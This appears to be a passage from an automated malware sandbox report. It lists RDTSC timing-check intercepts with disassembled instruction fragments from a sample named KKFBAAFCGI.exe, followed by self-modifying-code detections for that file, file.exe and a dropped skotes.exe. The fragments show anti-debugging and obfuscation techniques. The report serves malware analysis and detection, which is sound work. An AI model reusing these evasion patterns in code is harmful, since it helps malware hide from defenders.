Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6B73E4 second address: 6B73E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 67E406 second address: 67E40A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 67E40A second address: 67E40E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 67E40E second address: 67E432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA32872BAF0h 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FA32872BAEAh 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6BB998 second address: 6BB99C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6BB99C second address: 6BB9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FA32872BAF4h 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6BC156 second address: 6BC167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA328DF73A6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6BC167 second address: 6BC16C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6BC16C second address: 6BC172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6BF15B second address: 6BF16D instructions: 0x00000000 rdtsc 0x00000002 js 00007FA32872BAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FA32872BAECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6BF22B second address: 6BF230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6BF230 second address: 6BF236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6BF236 second address: 6BF263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA328DF73B7h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6BF263 second address: 6BF288 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA32872BAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FA32872BAE8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 ja 00007FA32872BAECh 0x0000001f rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6BF597 second address: 6BF59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6BF820 second address: 6BF824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6BF824 second address: 6BF82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C0239 second address: 6C023F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C02F9 second address: 6C0306 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C039D second address: 6C03AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007FA32872BAE6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C03AF second address: 6C03B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C03B3 second address: 6C03B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C12D8 second address: 6C12E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C12E3 second address: 6C137D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FA32872BAE8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov edi, ecx 0x00000027 call 00007FA32872BAEBh 0x0000002c jns 00007FA32872BAECh 0x00000032 pop esi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FA32872BAE8h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f mov di, bx 0x00000052 push 00000000h 0x00000054 sub edi, 3922173Dh 0x0000005a xchg eax, ebx 0x0000005b jc 00007FA32872BAF0h 0x00000061 push eax 0x00000062 jo 00007FA32872BAEEh 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C23AC second address: 6C23B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C23B0 second address: 6C23BA instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA32872BAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C2DF5 second address: 6C2E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA328DF73B5h 0x0000000e rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C2E13 second address: 6C2E1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FA32872BAE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C2E1D second address: 6C2E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C2E21 second address: 6C2E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FA32872BAE8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov esi, 631F2AD2h 0x00000028 push 00000000h 0x0000002a mov edi, 2B575506h 0x0000002f push 00000000h 0x00000031 clc 0x00000032 push eax 0x00000033 pushad 0x00000034 jmp 00007FA32872BAEEh 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C441C second address: 6C442B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C442B second address: 6C443E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA32872BAE6h 0x0000000a popad 0x0000000b jbe 00007FA32872BAECh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C72EA second address: 6C72F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C8339 second address: 6C8399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FA32872BAE8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 pushad 0x00000025 sub ah, 00000000h 0x00000028 or dword ptr [ebp+12464C3Eh], eax 0x0000002e popad 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+122D1DAEh], ebx 0x00000037 push 00000000h 0x00000039 pushad 0x0000003a mov edi, ebx 0x0000003c push ebx 0x0000003d movsx esi, si 0x00000040 pop ecx 0x00000041 popad 0x00000042 push eax 0x00000043 push esi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C8399 second address: 6C839D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C9452 second address: 6C9467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA32872BAF1h 0x00000009 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C9467 second address: 6C94CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA328DF73B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+1247E6E1h], eax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FA328DF73A8h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 call 00007FA328DF73ADh 0x00000037 mov edi, dword ptr [ebp+122D273Bh] 0x0000003d pop ebx 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 ja 00007FA328DF73A8h 0x00000047 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C94CE second address: 6C94D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C94D4 second address: 6C94D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C94D8 second address: 6C94DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C94DC second address: 6C94FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA328DF73B3h 0x00000010 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C2BC2 second address: 6C2BC8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C418E second address: 6C41AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA328DF73B5h 0x0000000c rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C4B92 second address: 6C4B97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C6146 second address: 6C614D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C74C9 second address: 6C74DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jno 00007FA32872BAE6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6CA617 second address: 6CA620 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6CA620 second address: 6CA668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 nop 0x00000007 mov ebx, ecx 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FA32872BAE8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 add dword ptr [ebp+122D33D0h], eax 0x0000002d push eax 0x0000002e pushad 0x0000002f jne 00007FA32872BAECh 0x00000035 pushad 0x00000036 jl 00007FA32872BAE6h 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C9659 second address: 6C96E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FA328DF73A8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push dword ptr fs:[00000000h] 0x0000002b call 00007FA328DF73AAh 0x00000030 jmp 00007FA328DF73ACh 0x00000035 pop ebx 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov bx, ax 0x00000040 mov eax, dword ptr [ebp+122D0069h] 0x00000046 mov dword ptr [ebp+122D1DE1h], esi 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push ebp 0x00000051 call 00007FA328DF73A8h 0x00000056 pop ebp 0x00000057 mov dword ptr [esp+04h], ebp 0x0000005b add dword ptr [esp+04h], 0000001Bh 0x00000063 inc ebp 0x00000064 push ebp 0x00000065 ret 0x00000066 pop ebp 0x00000067 ret 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c ja 00007FA328DF73A6h 0x00000072 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6C96E6 second address: 6C96EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6CA7F5 second address: 6CA800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA328DF73A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6CB7BA second address: 6CB85B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FA32872BAEEh 0x0000000f nop 0x00000010 mov edi, dword ptr [ebp+122D39BDh] 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007FA32872BAE8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 mov ebx, 33026369h 0x0000003c cld 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 sub edi, 7309DAA4h 0x0000004a mov eax, dword ptr [ebp+122D1255h] 0x00000050 or ebx, 75AFC914h 0x00000056 movzx edi, si 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push eax 0x0000005e call 00007FA32872BAE8h 0x00000063 pop eax 0x00000064 mov dword ptr [esp+04h], eax 0x00000068 add dword ptr [esp+04h], 0000001Bh 0x00000070 inc eax 0x00000071 push eax 0x00000072 ret 0x00000073 pop eax 0x00000074 ret 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 push edx 0x00000079 push ecx 0x0000007a pop ecx 0x0000007b pop edx 0x0000007c rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6CB85B second address: 6CB860 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6CC5F0 second address: 6CC643 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA32872BAF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D1DA3h], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FA32872BAE8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f push 00000000h 0x00000031 mov ebx, dword ptr [ebp+122D3B1Dh] 0x00000037 push eax 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6CD5EE second address: 6CD5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6CF62B second address: 6CF62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6CF62F second address: 6CF633 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6D065D second address: 6D0667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FA32872BAE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6D0667 second address: 6D066B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6D066B second address: 6D0681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FA32872BAE6h 0x00000016 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6D0681 second address: 6D06F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007FA328DF73AFh 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FA328DF73A8h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 jnp 00007FA328DF73ACh 0x0000002f mov dword ptr [ebp+122D315Dh], ebx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007FA328DF73A8h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Bh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 push eax 0x00000052 pushad 0x00000053 push edi 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6D06F1 second address: 6D06FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 6D166B second address: 6D1684 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA328DF73B5h 0x00000009 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 67C86C second address: 67C886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FA32872BAE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007FA32872BAE6h 0x00000013 jbe 00007FA32872BAE6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 67C886 second address: 67C88D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 67C88D second address: 67C8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jns 00007FA32872BAEEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA32872BAEFh 0x00000018 rdtsc
Source: C:\Users\user\Documents\KKFBAAFCGI.exe RDTSC instruction interceptor: First address: 67C8B7 second address: 67C8C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B1F98B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B1F8F1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: CCD986 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Special instruction interceptor: First address: 50ED20 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Special instruction interceptor: First address: 50EDB7 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Special instruction interceptor: First address: 6B2948 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Special instruction interceptor: First address: 50C63A instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Special instruction interceptor: First address: 6DBAFB instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KKFBAAFCGI.exe Special instruction interceptor: First address: 740966 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: EBED20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: EBEDB7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 1062948 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: EBC63A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 108BAFB instructions caused by: Self-modifying code
